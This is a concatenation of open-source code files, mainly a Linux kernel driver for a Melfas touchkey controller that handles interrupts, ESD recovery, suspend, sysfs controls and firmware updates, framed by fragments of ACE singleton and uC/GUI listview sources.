static ACE_LOCK *lock = &the_lock;
#else /* ACE_FACE_SAFETY_BASE */
static ACE_LOCK *lock = 0;
#endif /* ACE_FACE_SAFETY_BASE */
if (ACE_Object_Manager::get_singleton_lock (lock) != 0)
// Failed to acquire the lock!
return 0;
ACE_GUARD_RETURN (ACE_LOCK, ace_mon, *lock, 0);
#endif /* ACE_MT_SAFE */
if (singleton == 0)
ACE_NEW_RETURN (singleton,
(ACE_DLL_Singleton_T<TYPE, ACE_LOCK>),
0);
}
//ACE_REGISTER_FRAMEWORK_COMPONENT(ACE_DLL_Singleton<TYPE,ACE_LOCK>, singleton);
// Hand ownership to the framework repository for DLL-unload cleanup.
ACE_Framework_Repository::instance ()->register_component
(new ACE_Framework_Component_T<ACE_DLL_Singleton_T<TYPE, ACE_LOCK> > (singleton));
}
return &singleton->instance_;
}
// Destroy the DLL singleton and reset the pointer.
template <class TYPE, class ACE_LOCK> void
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::close (void)
{
ACE_TRACE ("ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::close");
ACE_DLL_Singleton_T<TYPE, ACE_LOCK> *&singleton =
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::instance_i ();
delete singleton;
singleton = 0;
}
// Framework-component hook: forwards to close().
template <class TYPE, class ACE_LOCK> void
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::close_singleton (void)
{
ACE_TRACE ("ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::close_singleton");
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::close ();
}
// Delegate to the wrapped TYPE's dll_name().
template <class TYPE, class ACE_LOCK> const ACE_TCHAR *
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::dll_name (void)
{
return this->instance ()->dll_name ();
}
// Delegate to the wrapped TYPE's name().
template <class TYPE, class ACE_LOCK> const ACE_TCHAR *
ACE_DLL_Singleton_T<TYPE, ACE_LOCK>::name (void)
{
return this->instance ()->name ();
}
/**********************************************************************/
// Adapter default: components living in the ACE library itself.
template <class TYPE> const ACE_TCHAR*
ACE_DLL_Singleton_Adapter_T<TYPE>::dll_name (void)
{
// @todo make this a constant somewhere (or it there already is one
// then use it.
return ACE_TEXT("ACE");
}
ACE_END_VERSIONED_NAMESPACE_DECL
#endif /* ACE_SINGLETON_CPP */
| gpl-2.0 |
sktjdgns1189/android_kernel_samsung_SHW-M130L | drivers/input/keyboard/melfas-touchkey.c | 2 | 20185 | /*
* Driver for keys on GPIO lines capable of generating interrupts.
*
* Copyright 2005 Phil Blundell
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*/
#include <linux/module.h>
#include <linux/init.h>
#include <linux/fs.h>
#include <linux/i2c.h>
#include <linux/interrupt.h>
#include <linux/irq.h>
#include <linux/sched.h>
#include <linux/pm.h>
#include <linux/sysctl.h>
#include <linux/proc_fs.h>
#include <linux/delay.h>
#include <linux/platform_device.h>
#include <linux/input.h>
#include <mach/regs-gpio.h>
#include <plat/gpio-cfg.h>
#include <asm/gpio.h>
#include <linux/miscdevice.h>
#include <asm/uaccess.h>
#include <linux/earlysuspend.h>
#include <asm/io.h>
#include <mach/gpio.h>
#include <mach/gpio-aries.h>
#ifdef CONFIG_CPU_FREQ
#include <mach/cpu-freq-v210.h>
#endif
/*
Melfas touchkey register
*/
#define KEYCODE_REG 0x00
#define FIRMWARE_VERSION 0x01
#define TOUCHKEY_MODULE_VERSION 0x02
#define TOUCHKEY_ADDRESS 0x20
#define UPDOWN_EVENT_BIT 0x08
#define KEYCODE_BIT 0x07
#define ESD_STATE_BIT 0x10
/* keycode value */
#define TOUCHKEY_KEYCODE_MENU 158
#define TOUCHKEY_KEYCODE_BACK 28
#define I2C_M_WR 0 /* for i2c */
#define IRQ_TOUCH_INT (IRQ_EINT_GROUP22_BASE + 1)
#define DEVICE_NAME "melfas-touchkey"
#define INT_PEND_BASE 0xE0200A54
#define MCS5000_CHIP 0x93
#define MCS5080_CHIP 0x90
#define MCS5000_last_ver 0x38
#define MCS5080_last_ver 0x30
// if you want to see log, set this definition to NULL or KERN_WARNING
#define TCHKEY_KERN_DEBUG KERN_DEBUG
extern unsigned int HWREV;
/* Keycode lookup indexed by the controller's 2-bit key id (index 0 is a
 * placeholder for "no key"). Fixed: NULL (a pointer constant) was used
 * as an integer initializer; 0 is the correct value. */
static int touchkey_keycode[3] = {0, TOUCHKEY_KEYCODE_MENU, TOUCHKEY_KEYCODE_BACK};
/* Driver-wide state flags and readings (single-writer from the driver's
 * own paths; no explicit locking in this file). */
static u8 activation_onoff = 1; // 0:deactivate 1:activate
static u8 is_suspending = 0;    /* set during early-suspend and ESD recovery */
static u8 user_press_on = 0;    /* 0 = none, 1 = menu pressed, 2 = back pressed */
static u8 touchkey_dead = 0;    /* set once ESD recovery is given up */
static u8 menu_sensitivity = 0; /* last raw sensitivity reading for menu key */
static u8 back_sensitivity = 0; /* last raw sensitivity reading for back key */
static u8 version_info[3];      /* firmware/module version bytes */
static void __iomem *gpio_pend_mask_mem; /* mapped INT_PEND_BASE register */
/* Per-device context: I2C client, input device, deferred IRQ work and
 * early-suspend hooks. */
struct i2c_touchkey_driver {
struct i2c_client *client;
struct input_dev *input_dev;
struct work_struct work;
struct early_suspend early_suspend;
};
/* Single global instance (this driver supports exactly one controller). */
struct i2c_touchkey_driver *touchkey_driver = NULL;
struct workqueue_struct *touchkey_wq;
/* I2C device id table for bus matching. */
static const struct i2c_device_id melfas_touchkey_id[] = {
{"melfas_touchkey", 0},
{}
};
MODULE_DEVICE_TABLE(i2c, melfas_touchkey_id);
extern void get_touchkey_data(u8 *data, u8 length);
static void init_hw(void);
static int i2c_touchkey_probe(struct i2c_client *client, const struct i2c_device_id *id);
/* I2C driver registration block (probe only; no remove/suspend ops). */
struct i2c_driver touchkey_i2c_driver =
{
.driver = {
.name = "melfas_touchkey",
},
.id_table = melfas_touchkey_id,
.probe = i2c_touchkey_probe,
};
/*
 * Read 'len' bytes from the touchkey controller into 'val'.
 * Retries up to 3 times with a 10 ms delay between attempts.
 * Returns 0 on success, a negative errno on failure (-ENODEV when the
 * driver is not initialised or the controller was declared dead).
 * NOTE(review): the 'reg' parameter is never used — the controller
 * presumably streams from a fixed register; confirm against the
 * datasheet before relying on it.
 */
static int i2c_touchkey_read(u8 reg, u8 *val, unsigned int len)
{
int err;
int retry = 3;
struct i2c_msg msg[1];
if((touchkey_driver == NULL)||touchkey_dead)
{
return -ENODEV;
}
while(retry--)
{
/* Single read transfer straight into the caller's buffer. */
msg->addr = touchkey_driver->client->addr;
msg->flags = I2C_M_RD;
msg->len = len;
msg->buf = val;
err = i2c_transfer(touchkey_driver->client->adapter, msg, 1);
if (err >= 0)
{
return 0;
}
printk(KERN_ERR "%s %d i2c transfer error\n", __func__, __LINE__);/* add by inter.park */
mdelay(10);
}
/* All retries exhausted: propagate the last i2c_transfer error. */
return err;
}
/*
 * Write 'len' bytes to the touchkey controller. Returns 0 on success,
 * a negative errno on failure (-ENODEV when uninitialised, suspending,
 * or the controller is dead). No retries, unlike the read path.
 * NOTE(review): only data[0] is copied from 'val' and the staging
 * buffer is 2 bytes — callers are assumed to pass len == 1; len == 2
 * would send an uninitialised byte and len > 2 would read past 'data'.
 * Confirm call sites.
 */
static int i2c_touchkey_write(u8 *val, unsigned int len)
{
int err;
struct i2c_msg msg[1];
unsigned char data[2];
if((touchkey_driver == NULL)||is_suspending||touchkey_dead)
{
return -ENODEV;
}
data[0] = *val;
msg->addr = touchkey_driver->client->addr;
msg->flags = I2C_M_WR;
msg->len = len;
msg->buf = data;
err = i2c_transfer(touchkey_driver->client->adapter, msg, 1);
if (err >= 0) return 0;
printk(KERN_ERR "%s %d i2c transfer error\n", __func__, __LINE__);
return err;
}
extern unsigned int touch_state_val;
extern void TSP_forced_release(void);
/*
 * Deferred IRQ handler (queued from touchkey_interrupt). Reads the key
 * state over I2C, performs ESD recovery if the controller reports an
 * error state or implausible sensitivity, and otherwise forwards
 * press/release events to the input subsystem. Always re-enables the
 * interrupt before returning, except when the controller is declared
 * dead after failed ESD recovery.
 */
void touchkey_work_func(struct work_struct * p)
{
u8 data[5];
int keycode;
int retry = 10;
/* Interrupt line is active-low; ignore spurious wakeups. */
if(!gpio_get_value(_3_GPIO_TOUCH_INT) && !touchkey_dead)
{
get_touchkey_data(data, 5);
/* NOTE(review): bitwise '|' is used where logical '||' was likely
   intended; the result happens to be equivalent here since each
   operand is zero/non-zero and only truthiness is tested. */
if((data[0] & ESD_STATE_BIT)|(data[3]>=45)|(data[4]>=45)) // ESD state or abnormal sensitivity
{
/* --- ESD recovery path: release any held key, then power-cycle
   the controller up to 10 times until an I2C read succeeds. --- */
is_suspending = 1;
printk(KERN_ERR "touchkey ESD_STATE_BIT set\n");
if(user_press_on==1)
{
/* NOTE(review): no input_sync() after these releases, unlike the
   normal release path below — confirm whether that is intended. */
input_report_key(touchkey_driver->input_dev, TOUCHKEY_KEYCODE_MENU, 0);
printk(TCHKEY_KERN_DEBUG "ESD release menu key\n");
}
else if(user_press_on==2)
{
input_report_key(touchkey_driver->input_dev, TOUCHKEY_KEYCODE_BACK, 0);
printk(TCHKEY_KERN_DEBUG "ESD release back key\n");
}
user_press_on = 0;
while(retry--)
{
/* Power the controller and both I2C lines down, wait, re-init. */
gpio_direction_output(_3_GPIO_TOUCH_EN, 0);
gpio_direction_output(_3_TOUCH_SDA_28V, 0);
gpio_direction_output(_3_TOUCH_SCL_28V, 0);
msleep(300);
init_hw();
if(i2c_touchkey_read(KEYCODE_REG, data, 3)>=0)
{
printk(TCHKEY_KERN_DEBUG "touchkey ESD init success\n");
enable_irq(IRQ_TOUCH_INT);
is_suspending = 0;
return;
}
printk(KERN_ERR "i2c transfer error after ESD, retry...%d",retry);
}
/* Recovery failed: mark the controller dead and leave it powered
   off. The IRQ is deliberately left disabled. */
touchkey_dead = 1;
gpio_direction_output(_3_GPIO_TOUCH_EN, 0);
gpio_direction_output(_3_TOUCH_SDA_28V, 0);
gpio_direction_output(_3_TOUCH_SCL_28V, 0);
printk(KERN_ERR "touchkey died after ESD");
return;
}
else
{
/* Normal path: low 3 bits of the status byte select the key. */
keycode = touchkey_keycode[data[0] & KEYCODE_BIT];
}
if(activation_onoff){
if(data[0] & UPDOWN_EVENT_BIT) // key released
{
user_press_on = 0;
input_report_key(touchkey_driver->input_dev, keycode, 0);
input_sync(touchkey_driver->input_dev);
printk(TCHKEY_KERN_DEBUG "touchkey release keycode: %d\n", keycode);
}
else // key pressed
{
/* Suppress touchkey presses while the touchscreen is active. */
if(touch_state_val == 1)
{
printk(TCHKEY_KERN_DEBUG "touchkey pressed but don't send event because touch is pressed. \n");
}
else
{
if(keycode==TOUCHKEY_KEYCODE_BACK)
{
/* Back cancels any in-progress touchscreen gesture. */
TSP_forced_release();
#ifdef CONFIG_CPU_FREQ
// set_dvfs_target_level(LEV_800MHZ);//set to comment temporarily by mseok.chae 2011.01.11
#endif
user_press_on = 2;
back_sensitivity = data[4];
input_report_key(touchkey_driver->input_dev, keycode,1);
input_sync(touchkey_driver->input_dev);
printk(TCHKEY_KERN_DEBUG "back key sensitivity = %d\n",back_sensitivity);
printk(TCHKEY_KERN_DEBUG " touchkey press keycode: %d\n", keycode);
}
else if(keycode==TOUCHKEY_KEYCODE_MENU)
{
user_press_on = 1;
menu_sensitivity = data[3];
input_report_key(touchkey_driver->input_dev, keycode,1);
input_sync(touchkey_driver->input_dev);
printk(TCHKEY_KERN_DEBUG "menu key sensitivity = %d\n",menu_sensitivity);
printk(TCHKEY_KERN_DEBUG " touchkey press keycode: %d\n", keycode);
}
}
}
}
}
else
printk(KERN_ERR "touchkey interrupt line is high!\n");
/* Re-arm the interrupt disabled in touchkey_interrupt(). */
enable_irq(IRQ_TOUCH_INT);
return ;
}
/*
 * Hard IRQ handler: masks the touchkey interrupt (re-enabled by the
 * work function once the I2C transaction completes) and defers all
 * processing to touchkey_work_func on the driver's workqueue, since
 * I2C transfers may sleep and cannot run in interrupt context.
 */
static irqreturn_t touchkey_interrupt(int irq, void *dummy)
{
disable_irq_nosync(IRQ_TOUCH_INT);
queue_work(touchkey_wq, &touchkey_driver->work);
return IRQ_HANDLED;
}
#ifdef CONFIG_HAS_EARLYSUSPEND
/*
 * Early-suspend hook: synthesise a release event for any key still held
 * (so userspace never sees a stuck key across suspend), then power the
 * controller down unless the ESD path already declared it dead.
 */
static void melfas_touchkey_early_suspend(struct early_suspend *h)
{
	is_suspending = 1;
	if (user_press_on == 1) {
		input_report_key(touchkey_driver->input_dev, TOUCHKEY_KEYCODE_MENU, 0);
		printk(TCHKEY_KERN_DEBUG "%s release menu key\n", __func__);
	} else if (user_press_on == 2) {
		input_report_key(touchkey_driver->input_dev, TOUCHKEY_KEYCODE_BACK, 0);
		printk(TCHKEY_KERN_DEBUG "%s release back key\n", __func__);
	}
	/*
	 * Bug fix: the synthesised release was reported without input_sync(),
	 * so the event could sit in the input queue instead of reaching
	 * userspace before the device powers down.  Flush it explicitly.
	 */
	if (user_press_on)
		input_sync(touchkey_driver->input_dev);
	user_press_on = 0;

	if (touchkey_dead) {
		printk(KERN_ERR "touchkey died after ESD");
		return;
	}
	disable_irq(IRQ_TOUCH_INT);
	/* Cut power and drive the I2C lines low while suspended. */
	gpio_direction_output(_3_GPIO_TOUCH_EN, 0);
	gpio_direction_output(_3_TOUCH_SDA_28V, 0);
	gpio_direction_output(_3_TOUCH_SCL_28V, 0);
}
/*
 * Early-resume hook: re-powers the controller, acknowledges any interrupt
 * that became pending while suspended, and re-enables the IRQ.  No-op if
 * the controller was declared dead by the ESD recovery path.
 */
static void melfas_touchkey_early_resume(struct early_suspend *h)
{
	if (touchkey_dead) {
		printk(KERN_ERR "touchkey died after ESD");
		return;
	}
	gpio_direction_output(_3_GPIO_TOUCH_EN, 1);
	msleep(100);	/* controller power-up settle time */
	/* clear interrupt: ack a pending touchkey IRQ (bit 1) before unmasking */
	if (readl(gpio_pend_mask_mem) & (0x1 << 1))
		writel(readl(gpio_pend_mask_mem) | (0x1 << 1), gpio_pend_mask_mem);
	enable_irq(IRQ_TOUCH_INT);
	is_suspending = 0;
}
#endif // End of CONFIG_HAS_EARLYSUSPEND
extern int mcsdl_download_binary_data(u8 chip_ver);
//extern int mcsdl_download_binary_file(unsigned char *pData, unsigned short nBinary_length);
/*
 * I2C probe: allocate driver state, register the input device for the two
 * touch keys, set up the deferred-work queue and early-suspend hooks, then
 * claim the interrupt line.
 *
 * Bug fix: the original leaked touchkey_driver when input allocation or
 * registration failed, and leaked the input device, workqueue and
 * early-suspend registration when request_irq() failed.  All error paths
 * now unwind what was set up before them.
 */
static int i2c_touchkey_probe(struct i2c_client *client, const struct i2c_device_id *id)
{
	struct device *dev = &client->dev;
	struct input_dev *input_dev;
	int err = 0;

	touchkey_driver = kzalloc(sizeof(struct i2c_touchkey_driver), GFP_KERNEL);
	if (touchkey_driver == NULL) {
		dev_err(dev, "failed to create our state\n");
		return -ENOMEM;
	}

	touchkey_driver->client = client;
	touchkey_driver->client->irq = IRQ_TOUCH_INT;
	strlcpy(touchkey_driver->client->name, "melfas-touchkey", I2C_NAME_SIZE);

	input_dev = input_allocate_device();
	if (!input_dev) {
		err = -ENOMEM;
		goto err_free_state;
	}

	touchkey_driver->input_dev = input_dev;
	input_dev->name = DEVICE_NAME;
	input_dev->phys = "melfas-touchkey/input0";
	input_dev->id.bustype = BUS_HOST;

	set_bit(EV_SYN, input_dev->evbit);
	set_bit(EV_KEY, input_dev->evbit);
	set_bit(touchkey_keycode[1], input_dev->keybit);
	set_bit(touchkey_keycode[2], input_dev->keybit);

	err = input_register_device(input_dev);
	if (err) {
		input_free_device(input_dev);
		goto err_free_state;
	}

	/* Interrupt-pend register mapping, used by the resume path. */
	gpio_pend_mask_mem = ioremap(INT_PEND_BASE, 0x10);

	touchkey_wq = create_singlethread_workqueue("melfas_touchkey_wq");
	if (!touchkey_wq) {
		err = -ENOMEM;
		goto err_unregister_input;
	}
	INIT_WORK(&touchkey_driver->work, touchkey_work_func);

#ifdef CONFIG_HAS_EARLYSUSPEND
	touchkey_driver->early_suspend.suspend = melfas_touchkey_early_suspend;
	touchkey_driver->early_suspend.resume = melfas_touchkey_early_resume;
	register_early_suspend(&touchkey_driver->early_suspend);
#endif /* CONFIG_HAS_EARLYSUSPEND */

	if (request_irq(IRQ_TOUCH_INT, touchkey_interrupt, IRQF_DISABLED, DEVICE_NAME, touchkey_driver)) {
		printk(KERN_ERR "%s Can't allocate irq ..\n", __FUNCTION__);
		err = -EBUSY;
		goto err_cleanup_late;
	}
	return 0;

err_cleanup_late:
#ifdef CONFIG_HAS_EARLYSUSPEND
	unregister_early_suspend(&touchkey_driver->early_suspend);
#endif
	destroy_workqueue(touchkey_wq);
	touchkey_wq = NULL;
err_unregister_input:
	input_unregister_device(input_dev);	/* also frees input_dev */
err_free_state:
	kfree(touchkey_driver);
	touchkey_driver = NULL;
	return err;
}
/*
 * One-time pin setup: power the controller, then configure the interrupt
 * pin as its external-interrupt special function with no pull, triggering
 * on the falling edge.
 */
static void init_hw(void)
{
	gpio_direction_output(_3_GPIO_TOUCH_EN, 1);
	msleep(100);	/* controller power-up settle time */
	s3c_gpio_setpull(_3_GPIO_TOUCH_INT, S3C_GPIO_PULL_NONE);
	s3c_gpio_cfgpin(S5PV210_GPJ4(1), S3C_GPIO_SFN(0xf));
	set_irq_type(IRQ_TOUCH_INT, IRQ_TYPE_EDGE_FALLING);
}
/*
 * /dev/melfas_touchkey file operations.  All four handlers are no-ops:
 * the character device is only registered so its sysfs attributes can be
 * attached to it in touchkey_init().
 */
int touchkey_update_open (struct inode *inode, struct file *filp)
{
	return 0;
}
ssize_t touchkey_update_read(struct file *filp, char *buf, size_t count, loff_t *f_pos)
{
	return 0;	/* always reports EOF */
}
ssize_t touchkey_update_write (struct file *filp, const char *buf, size_t count, loff_t *f_pos)
{
	return count;	/* accepts and discards all data */
}
int touchkey_update_release (struct inode *inode, struct file *filp)
{
	return 0;
}
/*
 * sysfs store for touchkey_activation: parses a decimal integer into
 * activation_onoff; the work handler drops key events while it is 0.
 * NOTE(review): the sscanf() result is unchecked, so non-numeric input
 * silently leaves activation_onoff untouched.
 */
static ssize_t touchkey_activation_store(struct device *dev,
		struct device_attribute *attr, const char *buf, size_t size)
{
	printk(TCHKEY_KERN_DEBUG "called %s\n",__func__);
	sscanf(buf, "%d", &activation_onoff);
	printk(TCHKEY_KERN_DEBUG "deactivation test = %d\n",activation_onoff);
	return size;
}
/* sysfs read: report the current firmware version byte in hex. */
static ssize_t touchkey_version_show(struct device *dev,
		struct device_attribute *attr, char *buf)
{
	printk(TCHKEY_KERN_DEBUG "called %s \n",__func__);
	return sprintf(buf,"%02x\n",version_info[1]);
}
/*
 * sysfs read: report the firmware version recommended for the detected
 * controller type; unknown modules get their current version echoed back.
 */
static ssize_t touchkey_recommend_show(struct device *dev,
		struct device_attribute *attr, char *buf)
{
	u8 recommended_ver;

	printk(TCHKEY_KERN_DEBUG "called %s \n",__func__);
	switch (version_info[2]) {
	case MCS5000_CHIP:
		recommended_ver = MCS5000_last_ver;
		break;
	case MCS5080_CHIP:
		recommended_ver = MCS5080_last_ver;
		break;
	default:
		/* unrecognised module: nothing newer to recommend */
		recommended_ver = version_info[1];
		break;
	}
	return sprintf(buf,"%02x\n",recommended_ver);
}
/*
 * sysfs read that triggers a firmware download matching the detected
 * module type, then re-reads and returns the (possibly updated) version.
 * NOTE(review): a plain read (e.g. `cat`) of this attribute reflashes the
 * part - presumably intentional for this platform's update tooling.
 */
static ssize_t touchkey_firmup_show(struct device *dev,
		struct device_attribute *attr, char *buf)
{
	printk(TCHKEY_KERN_DEBUG "Touchkey firm-up start!\n");
	if(version_info[2]==MCS5000_CHIP)
		mcsdl_download_binary_data(MCS5000_CHIP);
	else if(version_info[2]==MCS5080_CHIP)
		mcsdl_download_binary_data(MCS5080_CHIP);
	else
		printk(KERN_ERR "Touchkey IC module is old, can't update!");
	/* refresh cached version info after the flash attempt */
	get_touchkey_data(version_info, 3);
	printk(TCHKEY_KERN_DEBUG "Updated F/W version: 0x%x, Module version:0x%x\n", version_info[1], version_info[2]);
	return sprintf(buf,"%02x\n",version_info[1]);
}
/* sysfs read: non-zero when the controller was declared dead after ESD. */
static ssize_t touchkey_init_show(struct device *dev,
		struct device_attribute *attr, char *buf)
{
	printk(TCHKEY_KERN_DEBUG "called %s \n",__func__);
	return sprintf(buf,"%d\n",touchkey_dead);
}
/* sysfs read: menu-key sensitivity sampled on the last menu key press. */
static ssize_t touchkey_menu_show(struct device *dev,
		struct device_attribute *attr, char *buf)
{
	printk(TCHKEY_KERN_DEBUG "called %s \n",__func__);
	return sprintf(buf,"%d\n",menu_sensitivity);
}
/* sysfs read: back-key sensitivity sampled on the last back key press. */
static ssize_t touchkey_back_show(struct device *dev,
		struct device_attribute *attr, char *buf)
{
	printk(TCHKEY_KERN_DEBUG "called %s \n",__func__);
	return sprintf(buf,"%d\n",back_sensitivity);
}
/*
 * sysfs store that drives the touchkey backlight LED over I2C.
 * Ignored while a key is physically held (user_press_on non-zero) so the
 * LED command cannot race a press/release transaction.
 *
 * Bug fix: the original did sscanf(buf, "%d", &data) with data declared
 * as u8, writing a full int through a 1-byte stack variable - undefined
 * behavior / stack corruption.  Parse into an int and narrow explicitly.
 */
static ssize_t touch_led_control(struct device *dev, struct device_attribute *attr, const char *buf, size_t size)
{
	int value = 0;
	u8 data;

	if(user_press_on)
		return size;
	if (sscanf(buf, "%d", &value) != 1)
		return -EINVAL;	/* reject non-numeric input instead of sending garbage */
	data = (u8)value;
	i2c_touchkey_write(&data, 1); // LED on(data=1) or off(data=2)
	return size;
}
/*
 * sysfs store used when the platform shutdown thread begins: writing '0'
 * masks the interrupt and powers the controller down; any other command
 * is rejected with a log message.
 */
static ssize_t touchkey_enable_disable(struct device *dev, struct device_attribute *attr, const char *buf, size_t size)
{
	printk(TCHKEY_KERN_DEBUG "called %s %c \n",__func__, *buf);
	switch (*buf) {
	case '0':
		is_suspending = 1;
		disable_irq(IRQ_TOUCH_INT);
		gpio_direction_output(_3_GPIO_TOUCH_EN, 0);
		break;
	default:
		printk(KERN_ERR "%s: unknown command %c \n",__func__, *buf);
		break;
	}
	return size;
}
/* File operations for /dev/melfas_touchkey; all handlers are stubs above. */
struct file_operations touchkey_update_fops =
{
	.owner = THIS_MODULE,
	.read = touchkey_update_read,
	.write = touchkey_update_write,
	.open = touchkey_update_open,
	.release = touchkey_update_release,
};
/* Misc device node; its this_device anchors the sysfs attributes below. */
static struct miscdevice touchkey_update_device = {
	.minor = MISC_DYNAMIC_MINOR,	/* let the misc core assign a minor */
	.name = "melfas_touchkey",
	.fops = &touchkey_update_fops,
};
/*
 * sysfs attributes attached to the melfas_touchkey misc device.
 * NOTE(review): S_IWUGO makes touchkey_activation, brightness and
 * enable_disable world-writable; consider restricting to S_IWUSR|S_IWGRP.
 */
static DEVICE_ATTR(touchkey_activation, S_IRUGO | S_IWUGO, NULL, touchkey_activation_store);
static DEVICE_ATTR(touchkey_version, S_IRUGO, touchkey_version_show, NULL);
static DEVICE_ATTR(touchkey_recommend, S_IRUGO, touchkey_recommend_show, NULL);
static DEVICE_ATTR(touchkey_firmup, S_IRUGO, touchkey_firmup_show, NULL);
static DEVICE_ATTR(touchkey_init, S_IRUGO, touchkey_init_show, NULL);
static DEVICE_ATTR(touchkey_menu, S_IRUGO, touchkey_menu_show, NULL);
static DEVICE_ATTR(touchkey_back, S_IRUGO, touchkey_back_show, NULL);
static DEVICE_ATTR(brightness, S_IRUGO | S_IWUGO, NULL, touch_led_control);
static DEVICE_ATTR(enable_disable, S_IRUGO | S_IWUGO, NULL, touchkey_enable_disable);
static int __init touchkey_init(void)
{
int ret = 0;
u8 updated = 0;
if (ret = gpio_request(_3_GPIO_TOUCH_EN, "_3_GPIO_TOUCH_EN"))
printk(KERN_ERR "Failed to request gpio %s:%d\n", __func__, __LINE__);
if (ret = gpio_request(_3_GPIO_TOUCH_INT, "_3_GPIO_TOUCH_INT"))
printk(KERN_ERR "Failed to request gpio %s:%d\n", __func__, __LINE__);
ret = misc_register(&touchkey_update_device);
if (ret) {
printk(KERN_ERR "%s misc_register fail\n",__FUNCTION__);
}
if (device_create_file(touchkey_update_device.this_device, &dev_attr_touchkey_activation) < 0)
{
printk(KERN_ERR "%s device_create_file fail dev_attr_touchkey_activation\n",__FUNCTION__);
pr_err("Failed to create device file(%s)!\n", dev_attr_touchkey_activation.attr.name);
}
if (device_create_file(touchkey_update_device.this_device, &dev_attr_touchkey_version) < 0)
{
printk(KERN_ERR "%s device_create_file fail dev_attr_touchkey_version\n",__FUNCTION__);
pr_err("Failed to create device file(%s)!\n", dev_attr_touchkey_version.attr.name);
}
if (device_create_file(touchkey_update_device.this_device, &dev_attr_touchkey_recommend) < 0)
{
printk(KERN_ERR "%s device_create_file fail dev_attr_touchkey_recommend\n",__FUNCTION__);
pr_err("Failed to create device file(%s)!\n", dev_attr_touchkey_recommend.attr.name);
}
if (device_create_file(touchkey_update_device.this_device, &dev_attr_touchkey_firmup) < 0)
{
printk(KERN_ERR "%s device_create_file fail dev_attr_touchkey_firmup\n",__FUNCTION__);
pr_err("Failed to create device file(%s)!\n", dev_attr_touchkey_firmup.attr.name);
}
if (device_create_file(touchkey_update_device.this_device, &dev_attr_touchkey_init) < 0)
{
printk(KERN_ERR "%s device_create_file fail dev_attr_touchkey_init\n",__FUNCTION__);
pr_err("Failed to create device file(%s)!\n", dev_attr_touchkey_init.attr.name);
}
if (device_create_file(touchkey_update_device.this_device, &dev_attr_touchkey_menu) < 0)
{
printk(KERN_ERR "%s device_create_file fail dev_attr_touchkey_menu\n",__FUNCTION__);
pr_err("Failed to create device file(%s)!\n", dev_attr_touchkey_menu.attr.name);
}
if (device_create_file(touchkey_update_device.this_device, &dev_attr_touchkey_back) < 0)
{
printk(KERN_ERR "%s device_create_file fail dev_attr_touchkey_back\n",__FUNCTION__);
pr_err("Failed to create device file(%s)!\n", dev_attr_touchkey_back.attr.name);
}
if (device_create_file(touchkey_update_device.this_device, &dev_attr_brightness) < 0)
{
printk(KERN_ERR "%s device_create_file fail dev_attr_brightness\n",__FUNCTION__);
pr_err("Failed to create device file(%s)!\n", dev_attr_brightness.attr.name);
}
if (device_create_file(touchkey_update_device.this_device, &dev_attr_enable_disable) < 0)
{
printk(KERN_ERR "%s device_create_file fail dev_attr_touch_update\n",__FUNCTION__);
pr_err("Failed to create device file(%s)!\n", dev_attr_enable_disable.attr.name);
}
init_hw();
get_touchkey_data(version_info, 3);
printk(TCHKEY_KERN_DEBUG "%s F/W version: 0x%x, Module version:0x%x\n",__FUNCTION__, version_info[1], version_info[2]);
//------------------- Auto Firmware Update Routine Start -------------------//
if(HWREV>=8)
{
if(version_info[1]==0xff) //unknown firmware state
{
if(!mcsdl_download_binary_data(MCS5000_CHIP)) //try MCS-5000 download
mcsdl_download_binary_data(MCS5080_CHIP); // if first try is fail, MCS-5080 download
updated = 1;
}
else
{
if(version_info[2]>=MCS5000_CHIP) //MCS-5000
{
if(version_info[1]!=MCS5000_last_ver) //not latest version
{
mcsdl_download_binary_data(MCS5000_CHIP);
updated = 1;
}
}
else if(version_info[2]==MCS5080_CHIP)//MCS-5080
{
if(version_info[1]!=MCS5080_last_ver) //not latest version
{
mcsdl_download_binary_data(MCS5080_CHIP);
updated = 1;
}
}
else
printk("Touchkey IC module is old, can't update!");
}
if(updated)
{
get_touchkey_data(version_info, 3);
printk(TCHKEY_KERN_DEBUG "Updated F/W version: 0x%x, Module version:0x%x\n", version_info[1], version_info[2]);
}
}
//------------------- Auto Firmware Update Routine End -------------------//
ret = i2c_add_driver(&touchkey_i2c_driver);
if(ret||(touchkey_driver==NULL))
{
touchkey_dead = 1;
printk(KERN_ERR "melfas touch keypad registration failed, module not inserted.ret= %d\n",ret);
}
return ret;
}
/*
 * Module teardown: unregister the I2C driver and misc device, stop the
 * work queue, and release both GPIOs claimed in touchkey_init().
 * Bug fix: _3_GPIO_TOUCH_EN was requested in touchkey_init() but never
 * freed here, leaking the GPIO on module unload.
 */
static void __exit touchkey_exit(void)
{
	i2c_del_driver(&touchkey_i2c_driver);
	misc_deregister(&touchkey_update_device);
	if (touchkey_wq)
		destroy_workqueue(touchkey_wq);
	gpio_free(_3_GPIO_TOUCH_INT);
	gpio_free(_3_GPIO_TOUCH_EN);
}
/* Register late so the I2C and input subsystems are available first. */
late_initcall(touchkey_init);
module_exit(touchkey_exit);
MODULE_LICENSE("GPL");
MODULE_AUTHOR("@@@");
MODULE_DESCRIPTION("melfas touch keypad");
| gpl-2.0 |
weiqiangdragonite/blog_tmp | unix_linux/arm_asm/uCGUI/OK6410/src/uCGUI/GUI/Widget/LISTVIEW_Default.c | 2 | 2831 | /*
*********************************************************************************************************
* uC/GUI
* Universal graphic software for embedded applications
*
* (c) Copyright 2002, Micrium Inc., Weston, FL
* (c) Copyright 2002, SEGGER Microcontroller Systeme GmbH
*
* µC/GUI is protected by international copyright laws. Knowledge of the
* source code may not be used to write a similar product. This file may
* only be used in accordance with a license and should not be redistributed
* in any way. We appreciate your understanding and fairness.
*
----------------------------------------------------------------------
File : LISTVIEW_Default.c
Purpose : Implementation of listview widget
---------------------------END-OF-HEADER------------------------------
*/
#include "LISTVIEW_Private.h"
#if GUI_WINSUPPORT
/*********************************************************************
*
* Exported routines: Various methods
*
**********************************************************************
*/
/*********************************************************************
*
* LISTVIEW_SetDefaultFont
*/
const GUI_FONT GUI_UNI_PTR * LISTVIEW_SetDefaultFont(const GUI_FONT GUI_UNI_PTR * pFont) {
